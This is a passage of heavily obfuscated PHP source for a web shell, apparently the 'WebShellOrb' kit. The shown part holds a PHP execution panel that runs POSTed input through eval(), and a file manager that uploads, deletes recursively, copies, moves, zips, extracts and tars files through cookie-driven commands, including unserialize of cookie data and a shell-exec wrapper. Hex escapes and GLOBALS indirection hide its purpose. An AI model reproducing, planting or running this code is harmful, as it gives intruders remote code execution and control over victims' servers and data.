${${"\x47L\x4f\x42\x41L\x53"}["e\x63\x62\x63\x6d\x69\x79bu\x65"]} = ob_get_clean();
${${"G\x4c\x4f\x42\x41LS"}["\x65cbc\x6d\x69y\x62u\x65"]} = preg_replace(array(
"\x21(\x62\x6f\x64\x79|\x61:\x5cw+|b\x6fdy, \x74d, th, h1,\x20h2)\x20{.*}\x21\x6ds\x69\x55",
"\x21\x74d,\x20th\x20{(\x2e*)}!\x6ds\x69\x55",
"\x21\x3c\x69mg[^>]+\x3e\x21ms\x69U"
), array(
"",
"\x2ee,\x20\x2ev, \x2eh,\x20\x2eh\x20\x74\x68 {\$\x31}",
""
), ${${"\x47LO\x42\x41\x4c\x53"}["\x65cb\x63\x6di\x79\x62\x75e"]});
echo str_replace("<h\x31", "<\x68\x32", ${${"GL\x4f\x42AL\x53"}["\x65\x63b\x63\x6d\x69\x79\x62\x75e"]}) . "</\x64i\x76><b\x72>";
}
echo "<\x681\x3eEx\x65c\x75\x74\x69o\x6e\x20PH\x50-\x63\x6f\x64\x65\x3c/h1\x3e<div \x63\x6ca\x73\x73=\x63\x6fn\x74e\x6et>\x3c\x66\x6fr\x6d \x6e\x61\x6de=\x70f \x6det\x68o\x64\x3dp\x6fs\x74 \x6f\x6e\x73\x75\x62m\x69\x74=\x22if(\x74\x68is\x2e\x61\x6aax\x2ec\x68\x65\x63ke\x64){a('Php',\x6e\x75\x6c\x6c,\x74his.c\x6fde\x2evalue);}\x65\x6c\x73\x65{g(\x27P\x68p',\x6e\x75\x6cl,\x74\x68is\x2e\x63o\x64\x65\x2e\x76\x61\x6c\x75e,'\x27)\x3b}re\x74urn\x20\x66a\x6cse\x3b\"\x3e\x3c\x74\x65xtare\x61 na\x6d\x65\x3dc\x6fde clas\x73\x3d\x62igare\x61\x20\x69\x64\x3d\x50\x68p\x43\x6fd\x65\x3e" . (!empty($_POST["\x701"]) ? htmlspecialchars($_POST["p\x31"]) : "") . "\x3c/\x74e\x78\x74ar\x65\x61><\x69n\x70\x75t \x74y\x70\x65=s\x75\x62mit\x20val\x75e=\x45va\x6c\x20st\x79l\x65\x3d\"m\x61r\x67\x69\x6e-\x74\x6f\x70:\x35\x70x\">";
echo "\x20\x3c\x69\x6e\x70\x75\x74 t\x79pe\x3dc\x68e\x63\x6b\x62ox n\x61me\x3da\x6aa\x78 \x76\x61\x6cu\x65=1\x20" . ($_COOKIE[md5($_SERVER["\x48T\x54\x50_HO\x53\x54"]) . "\x61\x6aax"] ? "checked" : "") . "\x3e \x73\x65nd \x75s\x69\x6e\x67\x20AJ\x41\x58\x3c/\x66\x6frm\x3e<p\x72e id=P\x68p\x4fu\x74\x70u\x74\x20st\x79le=\"" . (empty($_POST["p1"]) ? "\x64\x69\x73pl\x61\x79:\x6eo\x6ee;" : "") . "ma\x72\x67\x69\x6e-\x74\x6f\x70:5p\x78\x3b\" c\x6ca\x73s=m\x6c1>";
if (!empty($_POST["\x701"])) {
ob_start();
eval($_POST["p1"]);
echo htmlspecialchars(ob_get_clean());
}
echo "\x3c/\x70\x72e\x3e</\x64\x69\x76>";
WebShellOrbFooter();
}
function actionFilesMan()
{
if (!empty($_COOKIE["f"]))
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
${"\x47L\x4fBA\x4cS"}["\x7a\x69pf\x76\x63"] = "i";
${"\x47\x4c\x4f\x42\x41L\x53"}["\x75ybul\x70\x67d\x79\x66\x65k"] = "\x64ir\x43on\x74e\x6e\x74";
$nqwroep = "\x73\x6f\x72\x74";
if (!empty($_POST["p1"])) {
switch ($_POST["p\x31"]) {
case "\x75p\x6co\x61\x64\x46i\x6c\x65":
if (!@move_uploaded_file($_FILES["f"]["\x74m\x70_n\x61me"], $_FILES["f"]["\x6eam\x65"]))
echo "Ca\x6e'\x74\x20up\x6coa\x64!";
break;
case "\x6d\x6bd\x69\x72":
if (!@mkdir($_POST["\x702"]))
echo "Ca\x6e\x27\x74 cre\x61\x74e!";
break;
case "\x64\x65let\x65":
function deleteDir($path)
{
${"\x47L\x4f\x42\x41\x4cS"}["\x74\x79i\x76\x68\x69\x73d\x66"] = "dh";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x68\x73\x64\x67\x6a\x6c\x64\x6f\x69\x76"] = "pat\x68";
$nqtkcimv = "\x70\x61\x74h";
${"\x47L\x4fB\x41\x4c\x53"}["\x71\x65\x61\x73\x63v\x65\x71\x75r"] = "\x70ath";
${${"\x47\x4c\x4fBA\x4cS"}["h\x73\x64g\x6a\x6cd\x6f\x69\x76"]} = (substr(${${"\x47LO\x42\x41LS"}["ff\x73\x77\x6c\x68a\x62"]}, -1) == "/") ? ${${"G\x4c\x4fB\x41\x4c\x53"}["qeasc\x76\x65qu\x72"]} : ${$nqtkcimv} . "/";
${"\x47\x4cO\x42A\x4c\x53"}["\x6fn\x67\x67m\x6a\x6ae"] = "\x69te\x6d";
${${"\x47\x4c\x4f\x42AL\x53"}["\x74y\x69vh\x69\x73\x64\x66"]} = opendir(${${"GL\x4fB\x41L\x53"}["\x66\x66\x73\x77l\x68\x61b"]});
while ((${${"GL\x4f\x42\x41\x4c\x53"}["o\x6e\x67g\x6d\x6a\x6a\x65"]} = readdir(${${"\x47\x4cO\x42\x41L\x53"}["\x71\x75\x62\x77\x6b\x62"]})) !== false) {
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["beu\x66\x6b\x66v\x72o\x77\x68"] = "i\x74e\x6d";
${"\x47\x4cO\x42\x41\x4c\x53"}["\x79\x73\x6e\x64\x62\x63\x72"] = "\x69\x74em";
${"\x47LOBALS"}["o\x6e\x6d\x74\x77\x6fl"] = "it\x65\x6d";
$nnxvvisqys = "typ\x65";
$rhijetcnxolz = "i\x74e\x6d";
$xnjcrutjrcsn = "\x70\x61th";
${${"GL\x4f\x42A\x4c\x53"}["\x62\x65\x75\x66kfv\x72o\x77\x68"]} = ${$xnjcrutjrcsn} . ${${"\x47LOB\x41\x4c\x53"}["\x6fn\x6d\x74\x77\x6fl"]};
if ((basename(${$rhijetcnxolz}) == ".\x2e") || (basename(${${"\x47\x4cO\x42\x41\x4cS"}["\x62\x64\x6d\x71\x77qv\x66\x71\x6e"]}) == "\x2e"))
continue;
${$nnxvvisqys} = filetype(${${"\x47\x4cOB\x41L\x53"}["y\x73\x6e\x64\x62cr"]});
if (${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x76\x78hdo\x69\x68q\x6c\x6bd"]} == "\x64\x69\x72")
deleteDir(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x62\x64\x6d\x71w\x71\x76\x66q\x6e"]});
else
@unlink(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x62\x64m\x71\x77q\x76fq\x6e"]});
}
closedir(${${"\x47\x4cOBA\x4cS"}["qu\x62\x77kb"]});
@rmdir(${${"G\x4cO\x42\x41LS"}["\x66\x66\x73\x77\x6ch\x61\x62"]});
}
if (is_array(@$_POST["f"])) {
foreach ($_POST["\x66"] as ${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x73be\x72l\x67"]}) {
$oqqgeuaw = "f";
${"\x47LO\x42\x41L\x53"}["q\x76\x79n\x78\x79e"] = "\x66";
if (${${"GL\x4fB\x41L\x53"}["\x73berl\x67"]} == "..")
continue;
${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71vy\x6ex\x79\x65"]} = urldecode(${${"G\x4cO\x42\x41\x4c\x53"}["sb\x65\x72\x6cg"]});
$knyiyrjbngh = "f";
if (is_dir(${$knyiyrjbngh}))
deleteDir(${$oqqgeuaw});
else
@unlink(${${"\x47\x4c\x4f\x42AL\x53"}["\x73\x62er\x6cg"]});
}
}
break;
case "\x70a\x73\x74\x65":
if ($_COOKIE["\x61ct"] == "\x63\x6fpy") {
${"\x47L\x4f\x42\x41LS"}["c\x6bz\x6c\x71vy\x6exr"] = "\x66";
function copy_paste($c, $s, $d)
{
${"\x47L\x4f\x42\x41\x4cS"}["fa\x67\x77\x67\x66\x72\x65"] = "c";
$hvvjqfgsnbl = "s";
${"\x47L\x4fBA\x4c\x53"}["\x64\x63\x73\x66\x6bi"] = "\x73";
$oswcoish = "\x64";
$ckvihtigyzh = "\x73";
if (is_dir(${${"G\x4cO\x42A\x4c\x53"}["\x73\x62\x75ww\x6boz\x74"]} . ${${"\x47\x4c\x4f\x42A\x4c\x53"}["dcs\x66\x6bi"]})) {
${"\x47\x4cO\x42ALS"}["\x76\x70\x6b\x62w\x79\x74\x79c"] = "\x64";
$dezosh = "\x68";
mkdir(${${"G\x4cO\x42\x41\x4c\x53"}["\x76\x70k\x62w\x79\x74y\x63"]} . ${${"G\x4c\x4fB\x41\x4c\x53"}["\x75o\x70u\x70g\x79"]});
$ciuvfitrhtj = "\x68";
${$dezosh} = @opendir(${${"\x47\x4cO\x42\x41L\x53"}["\x73\x62\x75\x77\x77\x6boz\x74"]} . ${${"\x47\x4c\x4fB\x41\x4cS"}["uo\x70\x75\x70\x67\x79"]});
while ((${${"\x47L\x4f\x42A\x4c\x53"}["\x73\x62\x65\x72lg"]} = @readdir(${$ciuvfitrhtj})) !== false) {
$cplqlcligwi = "\x64";
$ojvunulgmom = "f";
if ((${${"\x47L\x4fB\x41\x4c\x53"}["\x73\x62\x65\x72l\x67"]} != "\x2e") and (${$ojvunulgmom} != ".."))
copy_paste(${${"\x47\x4c\x4f\x42AL\x53"}["sb\x75\x77w\x6b\x6f\x7a\x74"]} . ${${"GL\x4f\x42\x41L\x53"}["\x75\x6f\x70\x75p\x67\x79"]} . "/", ${${"\x47\x4c\x4fB\x41\x4cS"}["s\x62er\x6c\x67"]}, ${$cplqlcligwi} . ${${"GLOB\x41\x4c\x53"}["\x75\x6f\x70u\x70\x67\x79"]} . "/");
}
} elseif (is_file(${${"\x47\x4c\x4f\x42\x41L\x53"}["fa\x67w\x67\x66re"]} . ${$ckvihtigyzh}))
@copy(${${"G\x4c\x4fBA\x4cS"}["\x73\x62u\x77\x77k\x6f\x7a\x74"]} . ${$hvvjqfgsnbl}, ${$oswcoish} . ${${"\x47LO\x42\x41L\x53"}["\x75o\x70u\x70g\x79"]});
}
${"\x47LO\x42\x41\x4c\x53"}["\x69g\x61\x71g\x6b"] = "\x66";
foreach ($_COOKIE["f"] as ${${"\x47\x4cOB\x41\x4cS"}["\x63\x6b\x7al\x71\x76\x79\x6ex\x72"]})
copy_paste($_COOKIE["c"], ${${"\x47L\x4fBA\x4cS"}["\x69\x67a\x71\x67\x6b"]}, $GLOBALS["\x63w\x64"]);
} elseif ($_COOKIE["\x61ct"] == "\x6dov\x65") {
$rhlfmvixur = "f";
function move_paste($c, $s, $d)
{
$ahtgbwuonw = "\x73";
$ckcnhxgr = "\x63";
$qppskt = "\x73";
if (is_dir(${${"\x47LO\x42\x41\x4c\x53"}["\x73\x62\x75\x77w\x6b\x6f\x7a\x74"]} . ${${"\x47\x4cOB\x41L\x53"}["\x75op\x75\x70\x67\x79"]})) {
$pkkrsanx = "f";
${"\x47L\x4f\x42\x41\x4cS"}["osj\x66e\x73f\x61"] = "s";
${"\x47LOB\x41\x4c\x53"}["n\x6fc\x66\x62\x76\x63\x6f\x68"] = "s";
$udkwdkzhbud = "\x63";
mkdir(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73\x6d\x63\x62\x67\x63\x79\x69"]} . ${${"GL\x4f\x42\x41\x4cS"}["\x6f\x73\x6a\x66e\x73\x66a"]});
$sutihmtajih = "\x68";
${$sutihmtajih} = @opendir(${$udkwdkzhbud} . ${${"G\x4c\x4f\x42\x41L\x53"}["\x6e\x6f\x63\x66\x62vc\x6f\x68"]});
while ((${$pkkrsanx} = @readdir(${${"\x47L\x4f\x42\x41\x4cS"}["\x61\x69\x68\x78\x74\x67u\x6a"]})) !== false) {
${"\x47\x4c\x4f\x42A\x4cS"}["\x63\x6e\x75\x69ke\x64\x6f"] = "s";
if ((${${"\x47LO\x42\x41\x4c\x53"}["\x73be\x72l\x67"]} != "\x2e") and (${${"\x47\x4cOBA\x4c\x53"}["\x73\x62\x65r\x6cg"]} != ".\x2e"))
copy_paste(${${"G\x4c\x4f\x42A\x4cS"}["s\x62\x75w\x77\x6b\x6fzt"]} . ${${"\x47\x4cOB\x41LS"}["\x63\x6eui\x6b\x65\x64\x6f"]} . "/", ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x62\x65r\x6c\x67"]}, ${${"\x47\x4cOBA\x4cS"}["\x73\x6d\x63bgcy\x69"]} . ${${"G\x4c\x4fB\x41LS"}["\x75\x6f\x70upg\x79"]} . "/");
}
} elseif (@is_file(${${"G\x4c\x4f\x42\x41\x4c\x53"}["s\x62\x75w\x77\x6boz\x74"]} . ${${"\x47L\x4fB\x41\x4c\x53"}["u\x6f\x70\x75\x70\x67\x79"]}))
@copy(${$ckcnhxgr} . ${$ahtgbwuonw}, ${${"\x47LOBA\x4c\x53"}["\x73\x6d\x63b\x67c\x79\x69"]} . ${$qppskt});
}
foreach ($_COOKIE["f"] as ${${"\x47\x4c\x4f\x42AL\x53"}["\x73\x62\x65\x72l\x67"]})
@rename($_COOKIE["c"] . ${${"\x47\x4c\x4f\x42A\x4c\x53"}["s\x62\x65\x72\x6c\x67"]}, $GLOBALS["cwd"] . ${$rhlfmvixur});
} elseif ($_COOKIE["\x61ct"] == "\x7a\x69\x70") {
if (class_exists("\x5a\x69p\x41r\x63\x68\x69\x76e")) {
$xkzwkjkkkw = "\x7a\x69\x70";
${$xkzwkjkkkw} = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
chdir($_COOKIE["c"]);
$turyinpqob = "f";
foreach ($_COOKIE["f"] as ${$turyinpqob}) {
$dgpduipixc = "\x66";
$ouqnccnwl = "\x66";
if (${$dgpduipixc} == ".\x2e")
continue;
if (@is_file($_COOKIE["\x63"] . ${${"\x47\x4c\x4fBA\x4c\x53"}["\x73b\x65\x72\x6c\x67"]}))
$zip->addFile($_COOKIE["c"] . ${${"\x47\x4c\x4fB\x41L\x53"}["\x73\x62\x65\x72l\x67"]}, ${$ouqnccnwl});
elseif (@is_dir($_COOKIE["\x63"] . ${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x73\x62\x65\x72l\x67"]})) {
${"\x47\x4c\x4f\x42\x41\x4cS"}["\x76\x65\x77\x74\x71\x69"] = "f";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x71\x75\x6e\x79\x61vcp"] = "\x6b\x65\x79";
${"\x47\x4cO\x42AL\x53"}["\x79\x65\x66\x6c\x66\x73\x77"] = "v\x61lu\x65";
$rimshoiye = "\x69\x74\x65r\x61\x74\x6fr";
${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x78q\x6a\x63\x79j\x66\x66\x69"]} = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(${${"\x47\x4cO\x42\x41LS"}["v\x65wt\x71\x69"]} . "/", FilesystemIterator::SKIP_DOTS));
foreach (${$rimshoiye} as ${${"\x47\x4cO\x42\x41\x4c\x53"}["\x71\x75\x6ey\x61v\x63\x70"]} => ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79\x65f\x6c\x66\x73\x77"]}) {
$smkpdcroxja = "key";
$zip->addFile(realpath(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6fo\x63w\x61\x62o"]}), ${$smkpdcroxja});
}
}
}
chdir($GLOBALS["c\x77d"]);
$zip->close();
}
}
} elseif ($_COOKIE["\x61\x63\x74"] == "\x75nz\x69\x70") {
if (class_exists("Z\x69p\x41\x72\x63\x68ive")) {
${"\x47LOBA\x4c\x53"}["\x65\x64\x6bqvu"] = "\x7a\x69\x70";
${${"\x47L\x4f\x42\x41LS"}["e\x64\x6bq\x76\x75"]} = new ZipArchive();
foreach ($_COOKIE["f"] as ${${"\x47\x4c\x4f\x42\x41LS"}["\x73b\x65\x72\x6c\x67"]}) {
${"\x47\x4c\x4f\x42\x41LS"}["\x74\x6fn\x6e\x6d\x6d\x68"] = "\x66";
if ($zip->open($_COOKIE["\x63"] . ${${"\x47LO\x42A\x4c\x53"}["\x74o\x6en\x6d\x6d\x68"]})) {
$zip->extractTo($GLOBALS["\x63w\x64"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["ac\x74"] == "tar") {
chdir($_COOKIE["c"]);
$_COOKIE["f"] = array_map("\x65\x73c\x61\x70\x65s\x68\x65\x6c\x6c\x61rg", $_COOKIE["f"]);
WebShellOrbEx("\x74a\x72 c\x66zv\x20" . escapeshellarg($_POST["p2"]) . "\x20" . implode(" ", $_COOKIE["\x66"]));
chdir($GLOBALS["cw\x64"]);
}
unset($_COOKIE["\x66"]);
setcookie("f", "", time() - 3600);
break;
default:
if (!empty($_POST["\x70\x31"])) {
WebShellOrbsetcookie("\x61ct", $_POST["\x70\x31"]);
WebShellOrbsetcookie("f", serialize(@$_POST["f"]));
WebShellOrbsetcookie("\x63", @$_POST["c"]);
}
break;
}
}
${"GLOB\x41\x4cS"}["\x71\x76p\x62\x66\x6cs"] = "d\x69\x72\x43onte\x6e\x74";
$kmcbnuop = "s\x6f\x72t";
WebShellOrbHeader();
echo "\x3c\x68\x31\x3eF\x69l\x65\x20\x6dana\x67er</h1><\x64\x69v\x20cl\x61s\x73\x3d\x63onte\x6e\x74\x3e\x3cs\x63\x72i\x70t\x3e\x70\x31_=p\x32_=\x70\x33\x5f=\"\";</\x73\x63r\x69\x70\x74>";
${${"\x47\x4cO\x42\x41L\x53"}["q\x76\x70b\x66ls"]} = WebShellOrbScandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]);
if (${${"\x47L\x4fBA\x4cS"}["u\x79\x62\x75\x6c\x70g\x64\x79\x66e\x6b"]} === false) {
echo "\x43an't \x6fpe\x6e \x74hi\x73\x20\x66o\x6c\x64\x65\x72\x21";
WebShellOrbFooter();
return;
}
${"G\x4c\x4fB\x41L\x53"}["\x75rs\x6cv\x76\x65v\x63y\x64"] = "fi\x6c\x65\x73";
global $sort;
${$kmcbnuop} = array(
"na\x6d\x65",
1
);
${"GL\x4fB\x41\x4c\x53"}["\x75c\x66\x6d\x62r\x65l\x73m"] = "\x66\x69\x6ce\x73";
if (!empty($_POST["\x701"])) {
${"G\x4c\x4fB\x41\x4c\x53"}["\x78\x71n\x78rg\x67"] = "ma\x74\x63\x68";
if (preg_match("!s_([A-\x7a]+)_(\x5cd{\x31})!", $_POST["p1"], ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78qn\x78r\x67\x67"]}))
${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x77\x78\x66\x6c\x72\x6bg\x68\x67"]} = array(
${${"\x47L\x4f\x42\x41\x4cS"}["\x6b\x68\x74\x6b\x62\x74\x62\x63\x70"]}[1],
(int) ${${"\x47\x4c\x4f\x42\x41L\x53"}["\x6b\x68tkb\x74bc\x70"]}[2]
);
}
echo "\x3csc\x72\x69p\x74\x3e\n\t\x66\x75\x6e\x63\x74i\x6f\x6e\x20\x73\x61()\x20{\n\t\t\x66\x6fr(\x69=0\x3b\x69\x3c\x64.fil\x65s\x2e\x65l\x65\x6d\x65nt\x73\x2e\x6c\x65ng\x74\x68\x3bi++)\n\t\t\t\x69\x66(d\x2ef\x69\x6c\x65s\x2ee\x6ce\x6de\x6et\x73[\x69]\x2e\x74y\x70e\x20\x3d\x3d '\x63h\x65\x63kb\x6fx')\n\t\t\t\t\x64.f\x69\x6ces.e\x6c\x65\x6dent\x73[\x69]\x2e\x63\x68\x65\x63\x6b\x65\x64\x20\x3d d.f\x69l\x65s\x2e\x65\x6c\x65\x6dents[\x30]\x2e\x63h\x65\x63\x6bed;\n\t}\n</\x73\x63r\x69p\x74>\n\x3cta\x62\x6c\x65 \x77i\x64t\x68='1\x300\x25'\x20\x63\x6ca\x73\x73='mai\x6e\x27\x20\x63e\x6c\x6csp\x61c\x69\x6e\x67=\x270\x27\x20ce\x6c\x6cpa\x64d\x69\x6e\x67\x3d'2'\x3e\n\x3c\x66\x6f\x72\x6d nam\x65\x3d\x66\x69l\x65\x73\x20met\x68\x6fd\x3d\x70o\x73t\x3e<t\x72>\x3cth\x20\x77\x69\x64\x74h\x3d\x27\x313px\x27\x3e<i\x6e\x70\x75\x74\x20t\x79\x70e=\x63\x68ec\x6bb\x6f\x78\x20o\x6ec\x6cick\x3d\x27sa()\x27\x20\x63l\x61\x73\x73=c\x68\x6bbx>\x3c/\x74\x68\x3e\x3cth\x3e<\x61 h\x72e\x66='#' o\x6eclic\x6b\x3d\x27g(\x22Fil\x65\x73\x4dan\",nul\x6c,\"\x73\x5fn\x61\x6d\x65\x5f" . (${${"\x47\x4cO\x42A\x4cS"}["\x77x\x66\x6c\x72k\x67h\x67"]}[1] ? 0 : 1) . "\x22)'>Na\x6d\x65</\x61\x3e\x3c/\x74h\x3e<\x74\x68\x3e<\x61 h\x72ef='\x23' on\x63li\x63\x6b\x3d'g(\"\x46i\x6c\x65\x73\x4d\x61n\x22,\x6eu\x6c\x6c,\x22s\x5f\x73iz\x65\x5f" . (${${"G\x4c\x4fB\x41\x4c\x53"}["w\x78fl\x72kg\x68\x67"]}[1] ? 0 : 1) . "\")'>S\x69ze\x3c/a\x3e</th><\x74\x68><a\x20hre\x66\x3d'\x23' o\x6e\x63\x6c\x69\x63k='g(\x22F\x69\x6c\x65\x73M\x61\x6e\",null,\"s\x5f\x6dod\x69\x66y\x5f" . (${${"\x47\x4c\x4f\x42\x41L\x53"}["\x77x\x66\x6c\x72\x6b\x67hg"]}[1] ? 0 : 1) . "\")'\x3eMo\x64i\x66\x79\x3c/a>\x3c/t\x68\x3e<\x74\x68\x3eOw\x6ee\x72/G\x72ou\x70\x3c/th>\x3cth\x3e\x3ca\x20\x68ref\x3d'\x23'\x20o\x6e\x63lic\x6b\x3d\x27g(\x22\x46\x69l\x65s\x4d\x61n\",n\x75l\x6c,\"\x73\x5fpe\x72m\x73_" . (${$nqwroep}[1] ? 0 : 1) . "\x22)\x27>P\x65\x72\x6d\x69ssions</a></\x74h\x3e\x3c\x74\x68\x3e\x41ct\x69\x6f\x6e\x73</\x74h>\x3c/tr\x3e";
${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x78\x7a\x6f\x63qro\x65s\x74sp"]} = ${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x63f\x6d\x62\x72\x65\x6csm"]} = array();
${"G\x4cOB\x41\x4c\x53"}["\x70\x77j\x78\x7a\x67\x74\x65\x73ey"] = "n";
${${"G\x4c\x4f\x42AL\x53"}["on\x6d\x64r\x78"]} = count(${${"\x47\x4c\x4f\x42\x41LS"}["\x71\x61nhu\x6f"]});
for (${${"GL\x4f\x42\x41\x4c\x53"}["\x63l\x6b\x75\x79\x6f\x6a\x6a"]} = 0; ${${"G\x4c\x4fBA\x4cS"}["\x63l\x6b\x75\x79\x6fjj"]} < ${${"\x47\x4c\x4fB\x41L\x53"}["\x70wj\x78\x7a\x67\x74e\x73\x65\x79"]}; ${${"\x47\x4c\x4fB\x41LS"}["\x7ai\x70\x66\x76c"]}++) {
${"\x47\x4c\x4fB\x41LS"}["p\x64\x61\x76y\x73t\x62n\x62"] = "di\x72Con\x74en\x74";
$dccmvjub = "t\x6d\x70";
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x71\x6da\x66uv\x72"] = "\x69";
$igxyngssey = "\x74m\x70";
$olxfijt = "\x64ir\x43onten\x74";
${"\x47L\x4fB\x41\x4c\x53"}["\x6d\x6c\x6f\x75\x67u"] = "i";
$xqzsqep = "d\x69\x72C\x6fn\x74e\x6e\x74";
${"\x47\x4cO\x42\x41\x4c\x53"}["p\x68bvl\x6c\x68\x65b\x6d\x6d\x79"] = "\x69";
${"GL\x4f\x42\x41\x4c\x53"}["e\x67\x65vs\x64\x67\x75y"] = "i";
$umpvgjutp = "g\x72";
${"\x47\x4cOB\x41\x4c\x53"}["j\x6a\x76k\x76g\x78\x72\x72g\x72"] = "\x67r";
${"\x47\x4cOB\x41\x4cS"}["k\x79\x6c\x64\x70p\x67ou"] = "d\x69\x72\x43\x6f\x6e\x74\x65\x6et";
$dfpwsfgwzk = "\x69";
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x7a\x70p\x7a\x63sfg\x6f"]} = @posix_getpwuid(@fileowner(${$olxfijt}[${${"G\x4c\x4f\x42A\x4c\x53"}["\x63\x6c\x6b\x75\x79oj\x6a"]}]));
$kbjcjgsc = "\x69";
${"G\x4c\x4f\x42A\x4c\x53"}["\x79\x6fv\x76\x63\x74\x64\x6b\x78"] = "\x64irCo\x6ete\x6e\x74";
$kvhmbnzvd = "\x64\x69\x72C\x6fnt\x65n\x74";
${$umpvgjutp} = @posix_getgrgid(@filegroup(${${"GL\x4fB\x41\x4c\x53"}["\x71\x61\x6eh\x75o"]}[${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x68bv\x6cl\x68\x65\x62\x6d\x6dy"]}]));
$fdkdqgpmwo = "i";
${"\x47\x4c\x4f\x42\x41L\x53"}["pr\x72iunh"] = "\x6f\x77";
${${"\x47\x4c\x4f\x42ALS"}["\x65cb\x63\x6di\x79\x62\x75\x65"]} = array(
"n\x61\x6de" => ${${"GL\x4f\x42\x41LS"}["\x6by\x6c\x64pp\x67\x6f\x75"]}[${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["c\x6ck\x75\x79\x6f\x6a\x6a"]}],
"\x70\x61\x74\x68" => $GLOBALS["\x63wd"] . ${${"\x47L\x4f\x42\x41\x4c\x53"}["q\x61\x6e\x68uo"]}[${${"GL\x4f\x42\x41\x4cS"}["c\x6c\x6bu\x79\x6fj\x6a"]}],
"m\x6f\x64\x69\x66y" => date("Y-\x6d-d\x20\x48:i:\x73", @filemtime($GLOBALS["\x63wd"] . ${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71\x61n\x68\x75\x6f"]}[${$kbjcjgsc}])),
"perms" => WebShellOrbPermsColor($GLOBALS["\x63\x77d"] . ${${"G\x4c\x4f\x42A\x4c\x53"}["q\x61n\x68uo"]}[${${"\x47\x4cO\x42A\x4c\x53"}["\x63\x6c\x6b\x75\x79\x6f\x6a\x6a"]}]),
"s\x69\x7a\x65" => @filesize($GLOBALS["cw\x64"] . ${$kvhmbnzvd}[${$dfpwsfgwzk}]),
"\x6f\x77ne\x72" => ${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x72\x72\x69\x75\x6e\x68"]}["\x6ea\x6d\x65"] ? ${${"\x47\x4c\x4fB\x41LS"}["\x7a\x70\x70\x7a\x63sf\x67o"]}["name"] : @fileowner(${${"\x47LO\x42\x41\x4c\x53"}["\x70\x64\x61\x76\x79\x73\x74b\x6e\x62"]}[${${"G\x4c\x4fB\x41L\x53"}["\x63\x6ck\x75yoj\x6a"]}]),
"\x67r\x6fup" => ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6ajv\x6b\x76\x67x\x72\x72\x67\x72"]}["\x6e\x61me"] ? ${${"\x47LO\x42A\x4cS"}["\x70\x75n\x6eqn\x73\x77y"]}["\x6eam\x65"] : @filegroup(${$xqzsqep}[${${"\x47\x4c\x4f\x42ALS"}["ml\x6f\x75\x67u"]}])
);
${"\x47\x4c\x4fBA\x4c\x53"}["i\x68\x6cumw\x6c\x71n\x68\x70"] = "\x64\x69\x72\x73";
if (@is_file($GLOBALS["cw\x64"] . ${${"GL\x4fB\x41LS"}["qa\x6e\x68uo"]}[${$fdkdqgpmwo}]))
${${"\x47LO\x42\x41\x4cS"}["yl\x75x\x65\x63\x6c\x6c"]}[] = array_merge(${$igxyngssey}, array(
"t\x79\x70e" => "\x66\x69\x6c\x65"
));
elseif (@is_link($GLOBALS["c\x77\x64"] . ${${"G\x4cO\x42\x41L\x53"}["\x71\x61\x6e\x68\x75o"]}[${${"G\x4cO\x42AL\x53"}["\x72\x71\x6d\x61fu\x76\x72"]}]))
${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x78\x7a\x6fc\x71r\x6f\x65\x73\x74sp"]}[] = array_merge(${${"\x47L\x4fB\x41\x4cS"}["e\x63b\x63m\x69y\x62ue"]}, array(
"type" => "li\x6ek",
"l\x69\x6e\x6b" => readlink(${$dccmvjub}["\x70ath"])
));
elseif (@is_dir($GLOBALS["\x63\x77d"] . ${${"G\x4cOB\x41L\x53"}["\x79\x6f\x76\x76c\x74dk\x78"]}[${${"\x47\x4cOB\x41L\x53"}["\x65ge\x76\x73\x64\x67\x75\x79"]}]))
${${"\x47\x4cOB\x41L\x53"}["\x69\x68l\x75\x6d\x77\x6cq\x6e\x68p"]}[] = array_merge(${${"\x47L\x4fB\x41\x4cS"}["ec\x62cm\x69\x79\x62\x75\x65"]}, array(
"\x74y\x70e" => "\x64\x69\x72"
));
}
$GLOBALS["\x73\x6frt"] = ${${"G\x4c\x4fB\x41\x4c\x53"}["\x77x\x66\x6c\x72\x6b\x67\x68g"]};
function WebShellOrbCmp($a, $b)
{
$wvhrpin = "\x62";
$cemcmlklowtc = "a";
if ($GLOBALS["so\x72\x74"][0] != "\x73ize")
return strcmp(strtolower(${${"\x47L\x4fB\x41L\x53"}["\x63\x78\x66\x62\x79\x66\x78\x61\x6a\x74"]}[$GLOBALS["\x73or\x74"][0]]), strtolower(${$wvhrpin}[$GLOBALS["sort"][0]])) * ($GLOBALS["\x73ort"][1] ? 1 : -1);
else
return ((${$cemcmlklowtc}["s\x69\x7ae"] < ${${"\x47L\x4fBA\x4c\x53"}["sl\x7a\x62\x75\x67\x64\x73"]}["\x73\x69\x7ae"]) ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1);
}
